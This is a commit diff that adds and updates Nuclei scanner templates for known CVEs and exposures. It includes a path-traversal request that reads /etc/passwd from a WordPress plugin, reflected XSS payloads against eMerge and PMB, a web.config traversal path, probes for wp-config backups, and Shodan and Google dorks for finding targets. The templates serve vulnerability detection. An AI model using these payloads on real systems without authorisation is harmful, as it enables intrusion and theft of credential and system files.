up PoCs 2022-09-01

Author: hktalent

config/nuclei-templates/cves/2015/CVE-2015-5469.yaml

@@ -0,0 +1,33 @@
+id: CVE-2015-5469
+info:
+  name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
+  author: 0x_Akoko
+  severity: high
+  description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
+  reference:
+    - https://www.openwall.com/lists/oss-security/2015/07/10/5
+    - https://www.cvedetails.com/cve/CVE-2015-5469/
+    - http://www.vapid.dhs.org/advisory.php?v=133
+    - http://www.openwall.com/lists/oss-security/2015/07/10/5
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-5469
+    cwe-id: CWE-22
+  tags: cve,cve2015,wp,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2019/CVE-2019-7255.yaml

@@ -0,0 +1,43 @@
+id: CVE-2019-7255
+
+info:
+  name: Linear eMerge E3 - Cross Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Linear eMerge E3-Series devices allow XSS via layout parameter.
+  reference:
+    - https://www.applied-risk.com/resources/ar-2019-005
+    - https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-7255
+    - https://applied-risk.com/labs/advisories
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-7255
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.title:"eMerge"
+    verified: "true"
+  tags: emerge,xss,packetstorm,cve,cve2019,nortek
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Template : <script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-2383.yaml

@@ -12,9 +12,12 @@ info:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
     - https://nvd.nist.gov/vuln/detail/CVE-2022-2383
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2022-2383
+    cwe-id: CWE-79
   metadata:
-    verified: true
+    verified: "true"
   tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
 
 requests:

config/nuclei-templates/cves/2022/CVE-2022-34328.yaml

@@ -0,0 +1,42 @@
+id: CVE-2022-34328
+
+info:
+  name: PMB 7.3.10 - Cross Site Scripting
+  author: edoardottt
+  severity: medium
+  description: |
+    PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.
+  reference:
+    - https://github.com/jenaye/PMB/blob/main/README.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34328
+    - https://github.com/jenaye/PMB
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-34328
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"PMB Group"
+    verified: "true"
+  tags: cve,cve2022,pmb,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>' target='cart_info"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/eMerge-panel.yaml

@@ -0,0 +1,28 @@
+id: eMerge-panel
+
+info:
+  name: Nortek Linear eMerge - Panel Detect
+  author: arafatansari
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"eMerge"
+  tags: panel,emerge,nortek
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<title>(.*)Linear eMerge(.*)</title>'
+          - '/emerge.ico'
+        condition: or
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposures/configs/web-config.yaml

@@ -2,14 +2,16 @@ id: web-config
 
 info:
   name: Web Config file
-  author: Yash Anand @yashanand155
+  author: Yash Anand @yashanand155,DhiyaneshDK
   severity: info
+  reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
   tags: config,exposure
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/web.config'
+      - '{{BaseURL}}/../../web.config'
 
     matchers-condition: and
     matchers:
@@ -21,4 +23,4 @@ requests:
 
       - type: status
         status:
-          - 200
+          - 200

config/nuclei-templates/misconfiguration/aem/aem-osgi-bundles.yaml

@@ -0,0 +1,30 @@
+id: aem-osgi-bundles
+
+info:
+  name: Adobe AEM Installed OSGI Bundles
+  author: dhiyaneshDk
+  severity: low
+  reference:
+    - https://www.slideshare.net/0ang3el/hacking-aem-sites
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bin.tidy.infinity.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"jcr:primaryType":'
+          - '"jcr:uuid":'
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/misconfiguration/aws-s3-explorer.yaml

@@ -0,0 +1,32 @@
+id: aws-s3-explorer
+
+info:
+  name: AWS S3 Explorer
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://www.exploit-db.com/ghdb/7967
+  metadata:
+    verified: true
+    google-dork: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
+  tags: s3,edb,misconfig,aws,amazon
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>AWS S3 Explorer</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/technologies/zap-api-detect.yaml

@@ -0,0 +1,23 @@
+id: zap-rest-api-detect
+
+info:
+  name: ZAP Rest API Server Running
+  author: hahwul
+  severity: info
+  reference:
+    - https://www.zaproxy.org/docs/api/
+  tags: zap,tech
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: response
+        words:
+          - '<title>ZAP API UI</title>'
+          - 'Welcome to the OWASP Zed Attack Proxy (ZAP)'
+          - 'Access-Control-Allow-Headers: ZAP-Header'
+        condition: or

config/nuclei-templates/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml

@@ -2,7 +2,7 @@ id: wordpress-accessible-wpconfig
 
 info:
   name: WordPress wp-config Detection
-  author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
+  author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess
   severity: medium
   description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
   classification:
@@ -32,6 +32,7 @@ requests:
       - '{{BaseURL}}/wp-config.php~'
       - '{{BaseURL}}/wp-config.php-backup'
       - '{{BaseURL}}/wp-config.php.orig'
+      - '{{BaseURL}}/wp-config.php_orig'
       - '{{BaseURL}}/wp-config.php.original'
       - '{{BaseURL}}/_wpeprivate/config.json'